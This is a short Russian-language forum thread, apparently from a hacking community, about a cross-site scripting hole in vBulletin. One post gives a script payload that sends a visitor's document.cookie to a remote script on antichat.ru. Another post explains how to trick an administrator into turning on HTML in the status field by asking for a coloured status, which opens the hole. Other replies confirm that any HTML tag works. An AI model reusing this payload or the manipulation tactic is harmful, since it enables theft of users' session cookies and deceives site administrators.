Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти
 
Страницы: 1
RSS
Межсайтовый скриптинг в vBulletin
 
Обсуждение статьи Межсайтовый скриптинг в vBulletin
 
Забавненько..не везде работает...
 
мля хотя бы пример написали,так использовать ?:
Код
<body onLoad=<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>>

или как,я вообще хз,намекните хоть кто-нить,плиз%)
 
Ага, щас тебе прямо всё-таки и разжевали!
Учи матчасть!!!  :funny:
 
Забыл сообщить: админ может конкретным пользователям настроить профиль, чтобы в поле статус html не воспринимался. Но тогда он не сможет покрасить цветом статус (админы любят красить свой статус красным). Т.е. если кто-то может менять свой статус, но не может внедрить html - просите админа покрасить статус цветом. Админ если согласится - будет вынужден врубить html. Тогда и XSS получите. Админ НЕ может сделать так, чтобы только он мог вам html прописывать: либо вы оба с админом можете, либо не можете. По крайней мере такой настройки в форумах исследованных без всяких хаков я не встречал...

Гость
Можно вставлять любые теги html: не обязательно <body onLoad. Классическая XSS. Любой пример с этого самого античата проканает.
"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."
 
is super   :offtop:
 
Старая версия, ща сейчас нечасто такую встретишь
 
Great, во-первых, тут версия не одна, а как минимум 2. Во-вторых, если я не проверял остальные версии - это ещё не значит, что они не узявимы
"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."
 
bezpantoVA(
Страницы: 1
Читают тему